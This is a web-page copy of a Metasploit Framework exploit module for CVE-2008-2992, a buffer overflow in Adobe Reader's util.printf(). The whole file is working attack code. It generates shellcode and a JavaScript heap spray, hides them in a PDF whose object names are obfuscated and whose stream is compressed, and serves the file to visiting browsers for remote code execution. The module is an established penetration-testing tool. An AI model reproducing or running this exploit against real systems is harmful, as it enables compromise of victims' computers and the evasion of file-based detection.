Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/browser/adobe_utilprintf.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
require 'zlib'
7
8
class MetasploitModule < Msf::Exploit::Remote
9
Rank = GoodRanking
10
11
include Msf::Exploit::Remote::HttpServer::HTML
12
13
def initialize(info = {})
14
super(
15
update_info(
16
info,
17
'Name' => 'Adobe util.printf() Buffer Overflow',
18
'Description' => %q{
19
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional
20
< 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf()
21
entry, an attacker may be able to execute arbitrary code.
22
},
23
'License' => MSF_LICENSE,
24
'Author' => [ 'MC', 'Didier Stevens <didier.stevens[at]gmail.com>' ],
25
'References' => [
26
[ 'CVE', '2008-2992' ],
27
[ 'OSVDB', '49520' ],
28
],
29
'DefaultOptions' => {
30
'EXITFUNC' => 'process',
31
},
32
'Payload' => {
33
'Space' => 1024,
34
'BadChars' => "\x00",
35
},
36
'Platform' => 'win',
37
'Targets' => [
38
[ 'Adobe Reader v8.1.2 (Windows XP SP3 English)', { 'Ret' => '' } ],
39
],
40
'DisclosureDate' => '2008-02-08',
41
'DefaultTarget' => 0,
42
'Notes' => {
43
'Reliability' => UNKNOWN_RELIABILITY,
44
'Stability' => UNKNOWN_STABILITY,
45
'SideEffects' => UNKNOWN_SIDE_EFFECTS
46
}
47
)
48
)
49
end
50
51
def autofilter
52
false
53
end
54
55
def check_dependencies
56
use_zlib
57
end
58
59
def on_request_uri(cli, request)
60
return if ((p = regenerate_payload(cli)) == nil)
61
62
# Encode the shellcode.
63
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
64
65
# Make some nops
66
nops = Rex::Text.to_unescape(make_nops(4))
67
68
# Randomize variables
69
rand1 = rand_text_alpha(rand(100) + 1)
70
rand2 = rand_text_alpha(rand(100) + 1)
71
rand3 = rand_text_alpha(rand(100) + 1)
72
rand4 = rand_text_alpha(rand(100) + 1)
73
rand5 = rand_text_alpha(rand(100) + 1)
74
rand6 = rand_text_alpha(rand(100) + 1)
75
rand7 = rand_text_alpha(rand(100) + 1)
76
rand8 = rand_text_alpha(rand(100) + 1)
77
rand9 = rand_text_alpha(rand(100) + 1)
78
rand10 = rand_text_alpha(rand(100) + 1)
79
rand11 = rand_text_alpha(rand(100) + 1)
80
randnop = rand_text_alpha(rand(100) + 1)
81
82
script = %Q|
83
var #{rand1} = unescape("#{shellcode}");
84
var #{randnop} = "#{nops}";
85
var #{rand2} ="";
86
for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape(#{randnop});
87
#{rand4} = #{rand2} + #{rand1};
88
#{rand5} = unescape("#{randnop}");
89
#{rand6} = 20;
90
#{rand7} = #{rand6}+#{rand4}.length
91
while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};
92
#{rand8} = #{rand5}.substring(0, #{rand7});
93
#{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});
94
while(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};
95
#{rand10} = new Array();
96
for (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};
97
util.printf("%45000.45000f", 0);
98
|
99
100
# Create the pdf
101
pdf = make_pdf(script)
102
103
print_status("Sending #{self.name}")
104
105
send_response(cli, pdf, { 'Content-Type' => 'application/pdf' })
106
107
handler(cli)
108
end
109
110
def random_non_ascii_string(count)
111
result = ""
112
count.times do
113
result << (rand(128) + 128).chr
114
end
115
result
116
end
117
118
def io_def(id)
119
"%d 0 obj" % id
120
end
121
122
def io_ref(id)
123
"%d 0 R" % id
124
end
125
126
# http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
127
def n_obfu(str)
128
result = ""
129
str.scan(/./u) do |c|
130
if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
131
result << "#%x" % c.unpack("C*")[0]
132
else
133
result << c
134
end
135
end
136
result
137
end
138
139
def ascii_hex_whitespace_encode(str)
140
result = ""
141
whitespace = ""
142
str.each_byte do |b|
143
result << whitespace << "%02x" % b
144
whitespace = " " * (rand(3) + 1)
145
end
146
result << ">"
147
end
148
149
def make_pdf(js)
150
xref = []
151
eol = "\x0d\x0a"
152
endobj = "endobj" << eol
153
154
pdf = "%PDF-1.5" << eol
155
pdf << "%" << random_non_ascii_string(4) << eol
156
xref << pdf.length
157
pdf << io_def(1) << n_obfu("<</Type/Catalog/Outlines ") << io_ref(2) << n_obfu("/Pages ") << io_ref(3) << n_obfu("/OpenAction ") << io_ref(5) << ">>" << endobj
158
xref << pdf.length
159
pdf << io_def(2) << n_obfu("<</Type/Outlines/Count 0>>") << endobj
160
xref << pdf.length
161
pdf << io_def(3) << n_obfu("<</Type/Pages/Kids[") << io_ref(4) << n_obfu("]/Count 1>>") << endobj
162
xref << pdf.length
163
pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3) << n_obfu("/MediaBox[0 0 612 792]>>") << endobj
164
xref << pdf.length
165
pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << endobj
166
xref << pdf.length
167
compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
168
pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
169
pdf << "stream" << eol
170
pdf << compressed << eol
171
pdf << "endstream" << eol
172
pdf << endobj
173
xrefPosition = pdf.length
174
pdf << "xref" << eol
175
pdf << "0 %d" % (xref.length + 1) << eol
176
pdf << "0000000000 65535 f" << eol
177
xref.each do |index|
178
pdf << "%010d 00000 n" % index << eol
179
end
180
pdf << "trailer" << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol
181
pdf << "startxref" << eol
182
pdf << xrefPosition.to_s() << eol
183
pdf << "%%EOF" << eol
184
end
185
end
186
187